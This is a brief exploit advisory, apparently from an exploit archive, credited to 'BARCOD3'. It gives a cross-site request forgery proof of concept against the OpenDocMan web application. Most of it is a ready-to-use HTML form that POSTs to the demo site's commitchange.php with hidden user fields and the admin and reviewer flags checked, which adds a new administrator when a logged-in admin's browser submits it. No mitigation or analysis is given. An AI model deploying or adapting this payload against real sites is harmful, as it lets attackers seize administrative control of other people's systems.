< ------------------- header data start ------------------- >


#############################################################

# Application Name : OpenDocMan

# Vulnerable Type : XSRF

# Infection : Yeni Administrator Eklenebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://www.opendocman.com/demo/

# Home : http://www.ozkanbozkurt.com


#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<h3>BARCOD3</h3>
<form name=add_user action=http://www.opendocman.com/demo/commitchange.php method=POST enctype=multipart/form-data>
<input name=last_name type=hidden value=LASTNAME>
<input name=first_name type=hidden value=NAME>
<input name=username type=hidden value=username>
<input name=phonenumber type=hidden value=123456798>
<input name=Email type=hidden value=[email protected]>
<INPUT type=hidden name=password value=passWORD>
<option value=1 selected=selected></option></select>
<input name=admin type=checkbox value=1 CHECKED>
<INPUT type=checkbox name=reviewer value=1 CHECKED>
<input type=Submit name=submit onClick=return validatemod(add_user); value=Add User>
</form>

< -- bug code end of -- >